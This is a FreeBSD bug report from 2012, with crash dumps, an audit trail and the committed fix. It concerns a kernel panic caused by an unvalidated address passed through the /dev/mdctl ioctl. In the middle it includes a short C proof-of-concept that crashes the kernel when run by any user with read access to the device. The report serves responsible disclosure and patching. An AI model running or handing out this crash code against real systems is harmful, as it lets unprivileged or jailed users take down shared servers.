From nobody@FreeBSD.org  Fri Jul  6 16:32:11 2012
Return-Path: <nobody@FreeBSD.org>
Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34])
	by hub.freebsd.org (Postfix) with ESMTP id A2B4A106566C
	for <freebsd-gnats-submit@FreeBSD.org>; Fri,  6 Jul 2012 16:32:11 +0000 (UTC)
	(envelope-from nobody@FreeBSD.org)
Received: from red.freebsd.org (red.freebsd.org [IPv6:2001:4f8:fff6::22])
	by mx1.freebsd.org (Postfix) with ESMTP id 8DD9D8FC12
	for <freebsd-gnats-submit@FreeBSD.org>; Fri,  6 Jul 2012 16:32:11 +0000 (UTC)
Received: from red.freebsd.org (localhost [127.0.0.1])
	by red.freebsd.org (8.14.4/8.14.4) with ESMTP id q66GWAQ6021895
	for <freebsd-gnats-submit@FreeBSD.org>; Fri, 6 Jul 2012 16:32:11 GMT
	(envelope-from nobody@red.freebsd.org)
Received: (from nobody@localhost)
	by red.freebsd.org (8.14.4/8.14.4/Submit) id q66GWAfw021894;
	Fri, 6 Jul 2012 16:32:10 GMT
	(envelope-from nobody)
Message-Id: <201207061632.q66GWAfw021894@red.freebsd.org>
Date: Fri, 6 Jul 2012 16:32:10 GMT
From: Filip Palian <filip.palian@pjwstk.edu.pl>
To: freebsd-gnats-submit@FreeBSD.org
Subject: System crash via ioctl() on mdctl.
X-Send-Pr-Version: www-3.1
X-GNATS-Notify:

>Number:         169683
>Category:       kern
>Synopsis:       [md] [panic] System crash via ioctl() on mdctl.
>Confidential:   no
>Severity:       serious
>Priority:       medium
>Responsible:    jh
>State:          patched
>Quarter:        
>Keywords:       
>Date-Required:  
>Class:          sw-bug
>Submitter-Id:   current-users
>Arrival-Date:   Fri Jul 06 16:40:03 UTC 2012
>Closed-Date:    
>Last-Modified:  Fri Jan  4 12:10:00 UTC 2013
>Originator:     Filip Palian
>Release:        FreeBSD 9.0-RELEASE #0
>Organization:
>Environment:
FreeBSD fbsd 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan 3 07:14:25 UTC 2012 root@obrian.cse.buffalo.edu:/usr/obj/usr/src/sys/GENEREIC i386
>Description:
User who has read permission on "/dev/mdctl" is able to crash the system (also within the jail if only provided by devfs(.rules)) via ioctl() handler in "/usr/src/sys/dev/md/md.c:1127". The crash occures in function bcopy() (md.c:491) called in mdstart_preload() (md.c:493). Some detailed information included below.

-- cut --
fbsd dumped core - see /var/crash/vmcore.0
..
panic: page fault
..
Unread portion of the kernel message buffer:

Fatal trap 12: page fault while in kernel mode
cpuid = 0; apic id = 00
fault virtual address   = 0xd550ba7a
fault code              = supervisor read, page not present
instruction pointer     = 0x20:0xc0d46bfe
stack pointer           = 0x28:0xd8e13ca0
frame pointer           = 0x28:0xd8e13cbc
code segment            = base 0x0, limit 0xfffff, type 0x1b
                        = DPL 0, pres 1, def32 1, gran 1
processor eflags        = interrupt enabled, resume, IOPL = 0
current process         = 3154 (md671657984)
trap number             = 12
panic: page fault
cpuid = 0
KDB: stack backtrace:
#0 0xc0a4b157 at kdb_backtrace+0x47
#1 0xc0a186b7 at panic+0x117
#2 0xc0d48cf3 at trap_fatal+0x323
#3 0xc0d48fa0 at trap_pfault+0x2a0
#4 0xc0d49b35 at trap+0x465
#5 0xc0d32a8c at calltrap+0x6
#6 0xc0731b12 at md_kthread+0x232
#7 0xc09ea997 at fork_exit+0x97
#8 0xc0d32b04 at fork_trampoline+0x8
Uptime: 9h48m43s
Physical memory: 1007 MB
Dumping 108 MB: 93 77 61 45 29 13

--

# nm -n /usr/obj/usr/src/sys/GENERIC/kernel.debug |grep c0d46b
c0d46b28 T bzero
c0d46b44 T sse2_pagezero
c0d46b64 T i686_pagezero
c0d46ba4 T fillw
c0d46bb8 T bcopyb
c0d46be4 T bcopy        <--- paniced here on $esi (0xd550ba7a)

--

(kgdb) bt
#0  doadump (textdump=1) at pcpu.h:244
#1  0xc0a1845a in kern_reboot (howto=260) at /usr/src/sys/kern/kern_shutdown.c:442
#2  0xc0a186f1 in panic (fmt=Variable "fmt" is not available.
) at /usr/src/sys/kern/kern_shutdown.c:607
#3  0xc0d48cf3 in trap_fatal (frame=0xd8e13c60, eva=3578837626) at /usr/src/sys/i386/i386/trap.c:975
#4  0xc0d48fa0 in trap_pfault (frame=0xd8e13c60, usermode=0, eva=3578837626) at /usr/src/sys/i386/i386/trap.c:888
#5  0xc0d49b35 in trap (frame=0xd8e13c60) at /usr/src/sys/i386/i386/trap.c:558
#6  0xc0d32a8c in calltrap () at /usr/src/sys/i386/i386/exception.s:168
#7  0xc0d46bfe in bcopy () at /usr/src/sys/i386/i386/support.s:196
Previous frame inner to this frame (corrupt stack?)
-- cut --
>How-To-Repeat:
Compile and execute the code from the attachment.
>Fix:
Validate input data from user to xmdctlioctl() in ""/usr/src/sys/dev/md/md.c".

To prevent evil users from doing bad things administrators should ensure, that "/dev/mdctl" permissions are +rw (600) only for root.

For servers where jails are provided for untrusted users (e.g. hosting companies) access to "/dev/mdctl" device should be forbidden/hidden using defvs.rules.

Patch attached with submission follows:

#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <fcntl.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/mdioctl.h>


int main()
{
	int f;
	struct md_ioctl s;
	struct stat ss;

	s.md_version = MDIOVERSION;
	//s.md_type = MD_PRELOAD;
	s.md_type = MD_MALLOC;
	/* this one becomes sc->pl_ptr */
	s.md_base = 0x41414141-0x200;

	if (stat("/dev/mdctl", &ss) != 0) {
		printf("stat(\"/dev/mdctl\") failed: %s\n", strerror(errno));
		exit (0);
	}

	f = open("/dev/mdctl", O_RDONLY, 0);

	printf("say goodnight...\n");

	if (ioctl(f, MDIOCATTACH, &s) < 0)
	      	printf("ioctl(MDIOCATTACH) failed: %s\n", strerror(errno));

	printf("no +r no fun\n");

	exit (0);
}


>Release-Note:
>Audit-Trail:
State-Changed-From-To: open->closed 
State-Changed-By: linimon 
State-Changed-When: Tue Jul 17 21:45:43 UTC 2012 
State-Changed-Why:  
Superseded by kern/169947. 

http://www.freebsd.org/cgi/query-pr.cgi?pr=169683 
State-Changed-From-To: closed->open 
State-Changed-By: linimon 
State-Changed-When: Wed Jul 18 14:22:00 UTC 2012 
State-Changed-Why:  
Apparently this is a different panic.  I was confused by the similarity 
in the Subject lines. 

http://www.freebsd.org/cgi/query-pr.cgi?pr=169683 
Responsible-Changed-From-To: freebsd-bugs->jh 
Responsible-Changed-By: jh 
Responsible-Changed-When: Tue Nov 6 15:58:42 UTC 2012 
Responsible-Changed-Why:  
Take. 

http://www.freebsd.org/cgi/query-pr.cgi?pr=169683 
State-Changed-From-To: open->patched 
State-Changed-By: jh 
State-Changed-When: Wed Nov 21 17:08:31 UTC 2012 
State-Changed-Why:  
Patched in head (r243372). 

Thanks for the report! 

http://www.freebsd.org/cgi/query-pr.cgi?pr=169683 

From: dfilter@FreeBSD.ORG (dfilter service)
To: bug-followup@FreeBSD.org
Cc:  
Subject: Re: kern/169683: commit references a PR
Date: Fri,  4 Jan 2013 12:07:07 +0000 (UTC)

 Author: jh
 Date: Fri Jan  4 12:06:59 2013
 New Revision: 245038
 URL: http://svnweb.freebsd.org/changeset/base/245038
 
 Log:
   MFC r243372:
   
   Disallow attaching preloaded memory disks via ioctl.
   
   - The feature is dangerous because the kernel code didn't check
     validity of the memory address provided from user space.
   - It seems that mdconfig(8) never really supported attaching preloaded
     memory disks.
   - Preloaded memory disks are automatically attached during md(4)
     initialization. Thus there shouldn't be much use for the feature.
   
   PR:		kern/169683
 
 Modified:
   stable/9/sbin/mdconfig/mdconfig.c
   stable/9/sys/dev/md/md.c
 Directory Properties:
   stable/9/sbin/mdconfig/   (props changed)
   stable/9/sys/   (props changed)
   stable/9/sys/dev/   (props changed)
 
 Modified: stable/9/sbin/mdconfig/mdconfig.c
 ==============================================================================
 --- stable/9/sbin/mdconfig/mdconfig.c	Fri Jan  4 11:57:27 2013	(r245037)
 +++ stable/9/sbin/mdconfig/mdconfig.c	Fri Jan  4 12:06:59 2013	(r245038)
 @@ -62,7 +62,7 @@ usage(void)
  "       mdconfig -d -u unit [-o [no]force]\n"
  "       mdconfig -l [-v] [-n] [-u unit]\n"
  "       mdconfig file\n");
 -	fprintf(stderr, "\t\ttype = {malloc, preload, vnode, swap}\n");
 +	fprintf(stderr, "\t\ttype = {malloc, vnode, swap}\n");
  	fprintf(stderr, "\t\toption = {cluster, compress, reserve}\n");
  	fprintf(stderr, "\t\tsize = %%d (512 byte blocks), %%db (B),\n");
  	fprintf(stderr, "\t\t       %%dk (kB), %%dm (MB), %%dg (GB) or\n");
 @@ -115,9 +115,6 @@ main(int argc, char **argv)
  			if (!strcmp(optarg, "malloc")) {
  				mdio.md_type = MD_MALLOC;
  				mdio.md_options = MD_AUTOUNIT | MD_COMPRESS;
 -			} else if (!strcmp(optarg, "preload")) {
 -				mdio.md_type = MD_PRELOAD;
 -				mdio.md_options = 0;
  			} else if (!strcmp(optarg, "vnode")) {
  				mdio.md_type = MD_VNODE;
  				mdio.md_options = MD_CLUSTER | MD_AUTOUNIT | MD_COMPRESS;
 
 Modified: stable/9/sys/dev/md/md.c
 ==============================================================================
 --- stable/9/sys/dev/md/md.c	Fri Jan  4 11:57:27 2013	(r245037)
 +++ stable/9/sys/dev/md/md.c	Fri Jan  4 12:06:59 2013	(r245038)
 @@ -854,27 +854,6 @@ mdinit(struct md_s *sc)
  	    DEVSTAT_ALL_SUPPORTED, DEVSTAT_TYPE_DIRECT, DEVSTAT_PRIORITY_MAX);
  }
  
 -/*
 - * XXX: we should check that the range they feed us is mapped.
 - * XXX: we should implement read-only.
 - */
 -
 -static int
 -mdcreate_preload(struct md_s *sc, struct md_ioctl *mdio)
 -{
 -
 -	if (mdio->md_options & ~(MD_AUTOUNIT | MD_FORCE))
 -		return (EINVAL);
 -	if (mdio->md_base == 0)
 -		return (EINVAL);
 -	sc->flags = mdio->md_options & MD_FORCE;
 -	/* Cast to pointer size, then to pointer to avoid warning */
 -	sc->pl_ptr = (u_char *)(uintptr_t)mdio->md_base;
 -	sc->pl_len = (size_t)sc->mediasize;
 -	return (0);
 -}
 -
 -
  static int
  mdcreate_malloc(struct md_s *sc, struct md_ioctl *mdio)
  {
 @@ -1186,8 +1165,12 @@ xmdctlioctl(struct cdev *dev, u_long cmd
  			error = mdcreate_malloc(sc, mdio);
  			break;
  		case MD_PRELOAD:
 -			sc->start = mdstart_preload;
 -			error = mdcreate_preload(sc, mdio);
 +			/*
 +			 * We disallow attaching preloaded memory disks via
 +			 * ioctl. Preloaded memory disks are automatically
 +			 * attached in g_md_init().
 +			 */
 +			error = EOPNOTSUPP;
  			break;
  		case MD_VNODE:
  			sc->start = mdstart_vnode;
 _______________________________________________
 svn-src-all@freebsd.org mailing list
 http://lists.freebsd.org/mailman/listinfo/svn-src-all
 To unsubscribe, send any mail to "svn-src-all-unsubscribe@freebsd.org"
 
>Unformatted:
